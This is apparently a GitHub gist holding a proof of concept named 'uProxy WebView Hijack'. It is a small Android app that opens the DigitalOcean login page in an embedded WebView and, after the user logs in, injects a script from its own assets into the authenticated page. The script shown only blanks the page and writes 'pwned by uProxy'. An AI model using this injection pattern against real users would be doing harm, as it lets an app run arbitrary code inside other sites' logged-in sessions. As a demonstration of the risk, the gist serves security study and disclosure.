Last active
November 17, 2016 20:46
-
-
Save jab/70c3026a470d38beb23d82ae19e50c91 to your computer and use it in GitHub Desktop.
uProxy WebView Hijack Proof of Concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<LinearLayout | |
xmlns:android="http://schemas.android.com/apk/res/android" | |
xmlns:tools="http://schemas.android.com/tools" | |
android:layout_width="match_parent" | |
android:layout_height="match_parent" | |
android:orientation="vertical"> | |
<TextView android:id="@+id/txt" | |
android:layout_width="wrap_content" | |
android:layout_height="wrap_content" | |
android:text="This hint is set based on the webview's current URL." /> | |
<WebView android:id="@+id/wv" | |
android:layout_width="wrap_content" | |
android:layout_height="wrap_content" /> | |
</LinearLayout> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<manifest xmlns:android="http://schemas.android.com/apk/res/android" | |
package="org.uproxy.webviewhijack"> | |
<application | |
android:allowBackup="true" | |
android:icon="@mipmap/ic_launcher" | |
android:label="@string/app_name" | |
android:supportsRtl="true" | |
android:theme="@style/AppTheme"> | |
<activity android:name=".MainActivity"> | |
<intent-filter> | |
<action android:name="android.intent.action.MAIN" /> | |
<category android:name="android.intent.category.LAUNCHER" /> | |
</intent-filter> | |
</activity> | |
</application> | |
<uses-permission android:name="android.permission.INTERNET" /> | |
</manifest> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.documentElement.remove(); | |
document.write('pwned by uProxy'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package org.uproxy.webviewhijack; | |
import android.os.Bundle; | |
import android.support.v7.app.AppCompatActivity; | |
import android.util.Log; | |
import android.webkit.WebSettings; | |
import android.webkit.WebView; | |
import android.widget.TextView; | |
public class MainActivity extends AppCompatActivity { | |
private uProxyWebViewClient wvc; | |
@Override | |
protected void onCreate(Bundle savedInstanceState) { | |
super.onCreate(savedInstanceState); | |
setContentView(R.layout.activity_main); | |
wvc = new uProxyWebViewClient(this); | |
WebView wv = (WebView) findViewById(R.id.wv); | |
wv.setWebViewClient(wvc); | |
WebSettings ws = wv.getSettings(); | |
ws.setJavaScriptEnabled(true); | |
ws.setAllowUniversalAccessFromFileURLs(true); | |
wv.loadUrl("https://cloud.digitalocean.com/login"); | |
onPageFinished(wv, wv.getUrl()); | |
} | |
public void onPageFinished(WebView wv, String url) { | |
TextView tv = (TextView) findViewById(R.id.txt); | |
Log.i("MainActivity", url); | |
if (url.equals("https://cloud.digitalocean.com/login")) { | |
tv.setText("Log into DigitalOcean below."); | |
} else if (url.equals("https://cloud.digitalocean.com/droplets")) { | |
tv.setText("You logged in successfully! Injecting custom script into the page."); | |
wvc.injectJS(wv); | |
} else { | |
tv.setText("The webview loaded an unrecognized URL, no contextual help available: " + url); | |
} | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package org.uproxy.webviewhijack; | |
import android.webkit.WebView; | |
import android.webkit.WebViewClient; | |
import java.io.IOException; | |
import java.io.InputStream; | |
public class uProxyWebViewClient extends WebViewClient { | |
private MainActivity parent; | |
private String injectedScript; | |
public uProxyWebViewClient(MainActivity main) { | |
super(); | |
parent = main; | |
byte[] buffer; | |
try (InputStream input = parent.getAssets().open("js/hijack.js")) { | |
buffer = new byte[input.available()]; | |
input.read(buffer); | |
injectedScript = new String(buffer, "utf-8"); | |
input.close(); | |
} catch (IOException e) { | |
e.printStackTrace(); | |
throw new RuntimeException("Could not read js/hijack.js"); | |
} | |
} | |
@Override | |
public boolean shouldOverrideUrlLoading(WebView webview, String url) { | |
return false; | |
} | |
@Override | |
public void onPageFinished(WebView wv, String url) { | |
super.onPageFinished(wv, url); | |
parent.onPageFinished(wv, url); | |
} | |
public void injectJS(WebView wv) { | |
wv.evaluateJavascript(injectedScript, null); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment